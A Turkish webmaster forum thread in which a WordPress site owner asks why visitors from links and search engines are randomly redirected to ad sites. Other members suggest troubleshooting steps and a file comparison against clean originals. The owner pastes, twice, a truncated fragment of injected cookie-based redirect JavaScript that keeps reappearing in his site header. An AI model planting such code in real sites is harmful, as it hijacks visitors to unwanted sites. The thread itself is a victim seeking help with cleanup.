wmaraci reklam

Web sitem bağlantı veya arama motorundan tıklanan girişlerde reklam sitesine yönleniyor

15 Mesajlar 2.137 Okunma
smmexpress

furkanavshar furkanavshar WM Aracı Kullanıcı
  • Üyelik 04.02.2017
  • Yaş/Cinsiyet 34 / E
  • Meslek Öğretmen
  • Konum Ankara
  • Ad Soyad F** A**
  • Mesajlar 5
  • Beğeniler 1 / 0
  • Ticaret 0, (%0)
Merhabalar,

Forumda yeniyim, hepinizi selamlıyorum.

Web sitemde 1 aydır çözemediğim bir sorunla karşı karşıyayım.
- Herhangi bir link üzerinden veya arama motorundan tıklayarak web siteme erişilmek istendiğinde -değişken zaman aralıklarında- reklam sitelerine yönleniyor.
- Her seferinde değil ama bir cihazdan ilk defa girildiğinde reklam sitesine yönleniyor. Sonra o cihazdan uzun bir süre yönlenmeden linke tıklayıp girilebiliyor. Bir zaman sonra tekrar yönlendirme yapabiliyor.
- İşin enteresan yanı, örneğin Facebook'ta web sitemden paylaştığım bir linke tıklayınca bazen reklam sitesine yönleniyor, bazen yönlenmiyor.
- Yönlendirilen web siteleri, adresler ve reklam sayfaları sabit değil. Her seferinde farklı farklı, rastgele çıkıyor.
- Adres çubuğundan site adını yazarak giriş yapıldığında hiçbir zaman yönlendirme yapmıyor. Daima sorunsuz giriyor.
- Sunucuyu değiştirdim, çözülmedi.
- Worpress'i silip tekrar yükledim, çözülmedi.
- Web sitesini silip tekrar yükledim, çözülmedi.
- Kullandığım tema ThemeForest'tan satın alındı ve diğer kullananlarda bu sorun yok.
- Eklentilerimin hepsi de Wordpress mağazadan panel aracılığıyla yüklendi. Hepsi de popüler ve güvenilir.

Ayrıca header'da bir kod oluşuyor sürekli, silsem de geri geliyor. Nerden geliyor olabilir?

<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script>

Yardımlarınızı bekliyorum. Çok teşekkür ederim.

wmaraci
reklam

webemrah webemrah WM Aracı Kullanıcı
  • Üyelik 26.01.2017
  • Yaş/Cinsiyet 36 / E
  • Meslek Müşteri temsilcisi
  • Konum İstanbul Avrupa
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 57 / 42
  • Ticaret 3, (%100)
Selam Furkan,

Farkı bilgisayar da denedin mi? Ya da farklı tarayıcı.

• Üyelik 04.02.2017
  • Yaş/Cinsiyet 34 / E
  • Meslek Öğretmen
  • Konum Ankara
  • Ad Soyad F** A**
  • Mesajlar 5
  • Beğeniler 1 / 0
  • Ticaret 0, (%0)
Evet, zaten kendi bilgisayarımda sık sık girdiğim için her zaman çıkmıyor. Yakınlarımın ve ziyaretçilerimin uyarılarıyla fark ediyorum. 1 aydır sitemin güvenilirliğini ve ziyaretini çok düşürdü bu durum.

• Üyelik 26.01.2017
  • Yaş/Cinsiyet 36 / E
  • Konum İstanbul Avrupa
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 57 / 42
  • Ticaret 3, (%100)
Biraz araştırma yaptım server dan dolayı diye sonuç buldum.

Konu burada okuyunuz.

ek : ayrıca .htaccess veya tema warezli ise ondan da kaynaklanabilirmiş.

wmaraci
wmaraci

• Üyelik 04.02.2017
  • Yaş/Cinsiyet 34 / E
  • Meslek Öğretmen
  • Konum Ankara
  • Ad Soyad F** A**
  • Mesajlar 5
  • Beğeniler 1 / 0
  • Ticaret 0, (%0)
Öncelikle ilgin için çok teşekkürler. Fakat sunucu da değiştirdim, panel de değiştirdim. Sonuç olumsuz :(
Tema themeforest'tan alındı. Orijinal lisanslı.

Sanırım veri tabanındaki dosyaların birinde veya birkaçında benim tespit edemediğim kodlar var. Bu işten pek anlamadığım için bulamıyorum. Bulsam da anlayamıyorum.

htaccess, index, header-footer vs. bilindik tüm taramaları ve kod kontrollerini yaptım. Bir sorun bulamadım.

js dosyalarında olabilir diyorlar, phplerde olabilir diyorlar, diyorlar da diyorlar.

Çevrimiçi ve çevrimdışı taramalarda da bir sorun, virüs vb. algılanmadı.

Geriye ne kalıyor? Buna ne sebep oluyor olabilir?

Bir de forumu aylardır takip ediyorum. İnsanlar neden web sitelerinin adreslerini vermiyorlar? (: Sebebini bilemeyince ben de yazmadım.

• Üyelik 26.01.2017
  • Yaş/Cinsiyet 36 / E
  • Konum İstanbul Avrupa
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 57 / 42
  • Ticaret 3, (%100)
neden site adresleri vermezler bilemem :) peki tema değişikliği yaptın mı ?

• Üyelik 04.02.2017
  • Yaş/Cinsiyet 34 / E
  • Meslek Öğretmen
  • Konum Ankara
  • Ad Soyad F** A**
  • Mesajlar 5
  • Beğeniler 1 / 0
  • Ticaret 0, (%0)
Temadan olduğunu sanmıyorum. Zaten tema da değiştirmeyi düşünmüyorum. İçerikler hep temaya özgü özellikler kullanıyor. Değiştirirsem her şey bozulur.

Aslında header'da bir kod var, onu silsem de geri geliyor. Ama nerden geliyor, bunu tekrar yazan şey ne, bulamıyorum.

<script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script><script>var b="red";c="mod";function setCookie(a,b,c){var d=new Date;d.setTime(d.getTime()+60*c*60*1e3);var e="expires="+d.toUTCString();document.cookie=a+"="+b+"; "+e}function getCookie(a){for(var b=a+"=",c=document.cookie.split(";"),d=0;d<' + '/script>')));</script>

• Üyelik 26.01.2017
  • Yaş/Cinsiyet 36 / E
  • Konum İstanbul Avrupa
  • Ad Soyad E** P**
  • Mesajlar 150
  • Beğeniler 57 / 42
  • Ticaret 3, (%100)
Demek istediğim geçici süreliğine tema değiş aynı sorunu alcak mısın test et

yilmaz70 yilmaz70 Güzel olacak Kullanıcı
  • Üyelik 03.02.2017
  • Yaş/Cinsiyet 53 / E
  • Meslek Web Tasarım
  • Konum İstanbul Anadolu
  • Ad Soyad D** K**
  • Mesajlar 4766
  • Beğeniler 3157 / 3156
  • Ticaret 12, (%100)
http://xiaquan.com

headerda bulunan site ismi?

eka7a eka7a openix.io Kullanıcı
  • Üyelik 18.06.2013
  • Yaş/Cinsiyet 38 / E
  • Meslek Yazılımcı
  • Konum Bursa
  • Ad Soyad E** K**
  • Mesajlar 651
  • Beğeniler 109 / 313
  • Ticaret 2, (%100)
1- FTP ile tüm dosyaları(wordpress, tema, eklenti vs) bilgisayarına sunucu adındaki bir klasöre indir

2- Kullandığın wp sürümünü, kullandığın tema, eklenti vs orjinal dosyalarını orjinal adında bir klasöre indir. Hepsini zipten çıkar. tema ve eklenti dosyalarını gerekli klasörlere yükle(Websitesindeki kurulumda yüklendiğimiz dizinlere)

3- Şimdi sunucu ve orjinal dizinini dosya karşılaştırma programı ile aralarındaki farkları kontrol et. Doğru sonucu alabilmen için her iki klasörün dizin yapısı aynı olmalıdır.

4- Senin bilgin dışındaki değişiklikleri ve varsa fazla olan dosyaları temizle.

5- Temizlediğin dosyaları sunucudaki dosyalarla değiştir.

6- Wordpress, tema ve eklentilerini güncelle.

7- PC de wa rez program varsa kaldır. Websitende kullandığın wa rez eklenti tema vs varsa kaldır.

Aksi taktirde sitedeki zararlı kodlardan kurtulamazsın. Kaldırsanda geri yüklenir.

Openix.io | $9.90 PositiveSSL | $12.90 RapidSSL
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al